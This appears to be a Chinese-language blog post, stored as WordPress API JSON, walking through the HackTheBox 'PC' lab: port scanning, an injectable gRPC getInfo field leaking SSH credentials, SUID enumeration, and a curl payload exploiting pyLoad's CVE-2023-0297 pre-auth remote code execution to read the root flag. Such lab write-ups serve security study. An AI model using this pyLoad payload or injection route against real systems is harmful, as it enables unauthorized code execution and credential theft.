{"id":803,"date":"2023-07-24T15:45:21","date_gmt":"2023-07-24T07:45:21","guid":{"rendered":"http:\/\/119.45.47.125\/?p=803"},"modified":"2023-07-24T15:48:12","modified_gmt":"2023-07-24T07:48:12","slug":"hackthebox-pc","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2023\/07\/24\/hackthebox-pc\/","title":{"rendered":"HackTheBox-PC"},"content":{"rendered":"<p>fscan \u626b\u63cf\u5565\u4e5f\u6ca1\u626b\u51fa\u6765\uff0c\u6362\u6210 nmap \u518d\u626b\u7aef\u53e3\uff0c\u53d1\u73b0 50051 \u5f00\u653e<\/p>\n<pre><code class=\"language-shell line-numbers\">nmap --min-rate 10000 -p- 10.10.11.214\n<\/code><\/pre>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175186-\u5fae\u4fe1\u622a\u56fe_20230724130604-1024x225.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175186-\u5fae\u4fe1\u622a\u56fe_20230724130604-1024x225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>web \u8bbf\u95ee\u662f\u4e71\u7801<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175283-\u5fae\u4fe1\u622a\u56fe_20230724130753-1024x324.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175283-\u5fae\u4fe1\u622a\u56fe_20230724130753-1024x324.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>Google \u641c\u4e86\u4e00\u4e0b\uff0c50051 \u7aef\u53e3\u5bf9\u5e94\u7684\u662f gRPC \u670d\u52a1<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175388-\u5fae\u4fe1\u622a\u56fe_20230724130908-1024x540.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690175388-\u5fae\u4fe1\u622a\u56fe_20230724130908-1024x540.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u7528 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1884418\" title=\"grpcurl\">grpcurl<\/a> \u53bb\u8bbf\u95ee gRPC \u670d\u52a1\uff0c\u7528 <code>go install<\/code> \u6216\u662f\u76f4\u63a5\u53bb <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/fullstorydev\/grpcurl\/releases\" title=\"Github\">Github<\/a> \u4e0a\u4e0b\u8f7d<\/p>\n<pre><code class=\"language-go line-numbers\">go install github.com\/fullstorydev\/grpcurl\/cmd\/grpcurl@latest\n<\/code><\/pre>\n<p>\u5728\u672c\u5730\u7684 <code>\/go\/bin<\/code> \u76ee\u5f55\u4e0b\u6267\u884c\u547d\u4ee4<\/p>\n<pre><code class=\"language-shell line-numbers\">.\/grpcui -plaintext 10.10.11.214:50051\n<\/code><\/pre>\n<p>\u81ea\u52a8\u5207\u6362\u81f3 web \u7aef<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690179506-\u5fae\u4fe1\u622a\u56fe_20230724141809-1024x517.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690179506-\u5fae\u4fe1\u622a\u56fe_20230724141809-1024x517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5b58\u5728\u767b\u5f55\u529f\u80fd\uff0c<code>admin\/admin<\/code> \u76f4\u63a5\u767b\u5f55\uff0c\u8fd4\u56de\u4e00\u4e32 <code>token<\/code>\uff0cJWT \u89e3\u4e00\u4e0b\u4e5f\u6ca1\u53d1\u73b0\u5176\u4ed6\u4e1c\u897f<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690179707-\u5fae\u4fe1\u622a\u56fe_20230724142111-1024x433.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690179707-\u5fae\u4fe1\u622a\u56fe_20230724142111-1024x433.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5207\u6362\u5230 getInfo \u529f\u80fd\uff0c\u6293\u5305\uff0c\u6d4b\u8bd5\u6ce8\u5165\uff0c\u53d1\u73b0 id \u5904\u53ef\u4ee5\u6ce8\u5165<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690181067-\u5fae\u4fe1\u622a\u56fe_20230724144416-1024x475.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690181067-\u5fae\u4fe1\u622a\u56fe_20230724144416-1024x475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5f97\u5230\u53e6\u5916\u4e00\u7ec4\u7528\u6237\u540d\u5bc6\u7801\uff0c\u5207\u6362 ssh \u767b\u5f55\uff0cuser.txt \u5c31\u5728\u5f53\u524d\u76ee\u5f55\u4e0b<\/p>\n<pre><code class=\"language-shell line-numbers\">ssh sau@10.10.11.214\n<\/code><\/pre>\n<p>\u5148\u8003\u8651 <code>sudo -l<\/code> \u548c <code>suid<\/code> \u63d0\u6743\uff0c\u4f46\u662f\u6ca1\u4ec0\u4e48\u53ef\u4ee5\u7528\u7684<\/p>\n<pre><code class=\"language-shell line-numbers\">find \/ -perm -u=s -type f 2&gt;\/dev\/null\n<\/code><\/pre>\n<pre><code class=\"language-shell line-numbers\">sau@pc:~$ find \/ -user root -perm -4000 -print 2&gt;\/dev\/null\n\/snap\/snapd\/17950\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1778\/usr\/bin\/chfn\n\/snap\/core20\/1778\/usr\/bin\/chsh\n\/snap\/core20\/1778\/usr\/bin\/gpasswd\n\/snap\/core20\/1778\/usr\/bin\/mount\n\/snap\/core20\/1778\/usr\/bin\/newgrp\n\/snap\/core20\/1778\/usr\/bin\/passwd\n\/snap\/core20\/1778\/usr\/bin\/su\n\/snap\/core20\/1778\/usr\/bin\/sudo\n\/snap\/core20\/1778\/usr\/bin\/umount\n\/snap\/core20\/1778\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1778\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/fusermount\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n<\/code><\/pre>\n<p><code>netstat -anp<\/code> \u67e5\u770b\u5f00\u653e\u7684\u7aef\u53e3\uff0c\u53d1\u73b0 8000 \u7aef\u53e3\u5f00\u653e<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183020-\u5fae\u4fe1\u622a\u56fe_20230724151602-1024x229.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183020-\u5fae\u4fe1\u622a\u56fe_20230724151602-1024x229.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<pre><code class=\"language-shell line-numbers\">curl -v http:\/\/127.0.0.1:8000\n<\/code><\/pre>\n<p>\u53d1\u73b0\u6709\u4e2a\u8df3\u8f6c URL\uff0c\u518d\u62fc\u63a5\u8bbf\u95ee<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183177-\u5fae\u4fe1\u622a\u56fe_20230724151925-1024x261.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183177-\u5fae\u4fe1\u622a\u56fe_20230724151925-1024x261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183279-\u5fae\u4fe1\u622a\u56fe_20230724152109-1024x474.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690183279-\u5fae\u4fe1\u622a\u56fe_20230724152109-1024x474.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u662f\u4e2a pyLoad\uff0c\u6070\u597d\u4eca\u5e74\u521d\u6709\u4e2a RCE \u6f0f\u6d1e(<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad\" title=\"CVE-2023-0297\">CVE-2023-0297<\/a>)<\/p>\n<pre><code class=\"language-shell line-numbers\">curl -d 'jk=pyimport%20os;os.system(\"mkdir%20\/tmp\/pwnd\");f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaaa' -X POST http:\/\/127.0.0.1:8000\/flash\/addcrypted2\n<\/code><\/pre>\n<p>\u6210\u529f\u521b\u5efa\uff0c\u7136\u540e <code>cat \/root\/root.txt &gt; \/tmp\/pwnd\/1<\/code>\uff0c\u76f4\u63a5\u8bfb\u5c31\u884c\u4e86<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690184061-\u5fae\u4fe1\u622a\u56fe_20230724153400-1024x190.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690184061-\u5fae\u4fe1\u622a\u56fe_20230724153400-1024x190.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>","protected":false},"excerpt":{"rendered":"fscan \u626b\u63cf\u5565\u4e5f\u6ca1\u626b\u51fa\u6765\uff0c\u6362\u6210 nmap \u518d\u626b\u7aef\u53e3\uff0c\u53d1\u73b0 50051 \u5f00\u653e nmap &#8211;min-rate [&hellip;]","protected":false},"author":1,"featured_media":820,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[35,26],"tags":[36],"class_list":["post-803","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-study","tag-hackthebox"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1690184859-%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20230724154706.png?fit=1531%2C253","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=803"}],"version-history":[{"count":6,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/803\/revisions"}],"predecessor-version":[{"id":819,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/803\/revisions\/819"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/820"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=803"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}